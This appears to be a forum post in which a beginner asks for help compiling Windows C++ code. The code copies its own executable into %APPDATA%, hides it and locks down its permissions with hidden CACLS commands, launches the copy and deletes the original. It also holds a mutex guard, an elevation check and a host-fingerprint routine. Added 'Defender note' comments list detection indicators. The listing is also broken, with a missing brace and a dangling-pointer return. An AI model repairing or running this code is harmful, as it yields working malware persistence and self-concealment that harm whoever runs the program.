I am trying to compile this code, which does nothing except the following: after I run it, it copies itself to another folder/path, then deletes itself and protects itself.
I want to learn more about how these things work, but I get some errors I can't fix, so I need some help to build it :)
Here is the list of errors:
Error C1075 '{': no matching token found
Error C2601 'WorkerID': local function definitions are illegal
Error C2601 'SelfDefense': local function definitions are illegal
Error C2601 'IsElevated': local function definitions are illegal
Error C2601 'Delete': local function definitions are illegal
Error C2601 'Copy': local function definitions are illegal
Error C2601 'CheckPath': local function definitions are illegal
Error C2601 'CheckMutex': local function definitions are illegal
I have zero experience with C++, so every attempt to fix this gave me more errors.
#define _UNICODE
#include "App.h"
#include "Myresearchconsoleapp/Entry.h"
#include "Myresearchconsoleapp/Process.h"
#include <windows.h>
#include <TCHAR.H>
#include <thread>
#include <sddl.h>
#include <stdio.h>
#include <aclapi.h>
#include <stdlib.h>
#include <Shlwapi.h>
#define STRICT
// Linker directives: fold the .data and .rdata sections into .text, then mark
// the merged .text section Execute + Write + Read (EWR).
// Defender note: a single section that is both writable and executable is
// atypical for ordinary compiler output and is a common static-triage flag
// when inspecting a PE file's section table.
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
#pragma comment(linker, "/SECTION:.text,EWR")
// Element count of a TCHAR array minus one (space for the terminator).
// Only meaningful for a true array; applied to a pointer it measures the pointer.
#define STRLEN(x)(sizeof(x) / sizeof(TCHAR) - 1)
// Program entry point. Wraps the command line in a Process object and asks
// Entry::get for an entry id; a non-zero id is dispatched straight to
// Entry::exec and its result becomes the exit code.
// Process and Entry come from the project headers included above and are not
// shown on this page, so what an "entry" actually runs cannot be told from here.
int main(int argc, char **argv) {
using namespace mystudyapp;
Process process(argc, argv);
const Entry::Id entry = Entry::get(process);
if (entry) {
return Entry::exec(process, entry);
}
// Placeholder: performs no work and always reports success.
// Declared as C++ bool but returns the Win32 TRUE macro.
bool SelfDefense()
{
return TRUE;
}
// Schedules deletion of the file at `path` and terminates the current process.
// A hidden cmd.exe is started that waits two seconds and then runs `del` on the
// path; the process exits immediately afterwards, presumably so the image is no
// longer in use when `del` runs.
// Defender note: a hidden cmd.exe child whose command line pairs `timeout` with
// `del` of the parent's own image path is the observable trace of this routine
// in process-creation telemetry.
int Delete(TCHAR* path) {
// MAX_PATH + 1 elements must hold the fixed text plus the whole path.
TCHAR DelCom[MAX_PATH + 1];
// wsprintfW is not told the buffer size, so a long path can overrun DelCom.
wsprintfW(DelCom, L"/c timeout -t 2 && del \"%s\"", path);
// Result of ShellExecuteW is not checked.
ShellExecuteW(0, L"open", L"cmd.exe", DelCom, 0, SW_HIDE);
// Never returns, so the declared int return value is never produced.
std::exit(0);
}
// Copies the running image from CruPath to CopyPth, hides and ACL-restricts the
// copy, starts it, and then hands the original to Delete().
//   CopyPth  - destination path of the copy
//   CruPath  - path of the currently running image
//   Username - account name substituted into the CACLS commands
// No return statement is present although the function is declared int; no
// call in this routine has its result checked.
// Defender note: the observable sequence is a file written to the destination,
// its attributes set to hidden + read-only + system, two hidden cmd.exe
// children running CACLS against it, a new process started from it, and the
// original image removed shortly afterwards.
int Copy(TCHAR* CopyPth, TCHAR* CruPath, TCHAR* Username) {
STARTUPINFO si;
TCHAR CACLS[1024];
TCHAR CACLS2[1024];
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(pi));
// Third argument true = fail rather than overwrite an existing destination.
CopyFile(CruPath, CopyPth, true);
SetFileAttributes(CopyPth, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
// First CACLS call: edit the existing ACL (/E) and set the user's access to None.
wsprintfW(CACLS, L"/c CACLS \"%s\" /E /P %s:N", CopyPth, Username);
ShellExecuteW(0, L"open", L"cmd.exe", CACLS, 0, SW_HIDE);
// Second CACLS call: set the user's access to Read; "Echo Y|" answers the
// confirmation prompt. Both commands are launched asynchronously, so their
// relative order of completion is not guaranteed by this code.
wsprintfW(CACLS2, L"/c Echo Y| CACLS \"%s\" /P %s:R", CopyPth, Username);
ShellExecuteW(0, L"open", L"cmd.exe", CACLS2, 0, SW_HIDE);
// Starts the copy as a new process; the handles returned in pi are never closed.
CreateProcess(NULL, CopyPth, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
// Delete() exits the process, so control does not come back here.
Delete(CruPath);
}
// Single-instance guard: creates the named mutex Global\Mutex01 and exits the
// process if the name already exists or access to it is denied. Otherwise
// returns 0 and leaves the handle open, so the mutex lives as long as the process.
// Defender note: the fixed mutex name is a host-based indicator that can be
// looked for in handle listings of a running process.
int CheckMutex() {
WCHAR MUTEX[] = { L"Global\\Mutex01" };
HANDLE hMutex = CreateMutexW(0, 0, MUTEX);
// hMutex itself is not tested; on ERROR_ACCESS_DENIED CreateMutexW is expected
// to have failed, in which case the CloseHandle below receives a null handle.
if ((GetLastError() == ERROR_ALREADY_EXISTS) || (GetLastError() == ERROR_ACCESS_DENIED)) {
CloseHandle(hMutex);
std::exit(0);
}
return 0;
}
// Reports whether the current process token is elevated.
// Returns the TokenIsElevated field of the token's TOKEN_ELEVATION data, or
// FALSE if the token cannot be opened or queried.
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
// TOKEN_QUERY is the only access requested on the process token.
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation;
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
// Close the token handle on every path where it was opened.
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
// Compares the path of the running image with %APPDATA%\mystudyapp.exe.
// If they differ, calls Copy() to place and start a copy at that location;
// if they match, runs the single-instance check and the SelfDefense() stub.
// Only the matching branch has a return statement.
// Defender note: an executable placed directly under the user's roaming
// AppData folder and started from there is the file-system trace of this path.
int CheckPath() {
TCHAR Username[256];
TCHAR AppData[1024 + 1];
// Elevation state is queried but the value is not used anywhere below.
BOOL Admin = IsElevated();
TCHAR CruPath[MAX_PATH + 1];
// The explicit W API variants are mixed with TCHAR buffers here; this only
// lines up when TCHAR is wide.
ExpandEnvironmentStringsW(L"%USERNAME%", Username, 256);
ExpandEnvironmentStringsW(L"%APPDATA%\\mystudyapp.exe", AppData, 1024);
// STRLEN(CruPath) evaluates to MAX_PATH, one less than the array length.
GetModuleFileName(NULL, CruPath, STRLEN(CruPath));
// Case-sensitive comparison of the two path strings.
if (_tcscmp(CruPath, AppData) != 0) {
Copy(AppData, CruPath, Username);
}
else {
CheckMutex();
// Result of the stub is tested but nothing is done with it.
if (SelfDefense()) {}
return 0;
}
}
// Builds a host identifier string from the volume serial number of c:\.
// Defender note: deriving an id from the volume serial number is a form of
// host fingerprinting; the value is stable for a given volume.
char* WorkerID() {
DWORD VolumeSerialNumber = 0;
// Only the serial number is requested; the result of the call is not checked,
// so the id is "0" if the query fails.
GetVolumeInformation(L"c:\\", NULL, NULL, &VolumeSerialNumber, NULL, NULL, NULL, NULL);
char procID[20];
// %d formats the unsigned DWORD as a signed decimal.
sprintf(procID, "%d", VolumeSerialNumber);
// Returns the address of the local array procID, whose lifetime ends when the
// function returns.
return procID;
// As the listing stands, the two statements below follow the return above and
// are never reached; App is declared in a project header not shown here.
App app(&process);
return app.exec();
}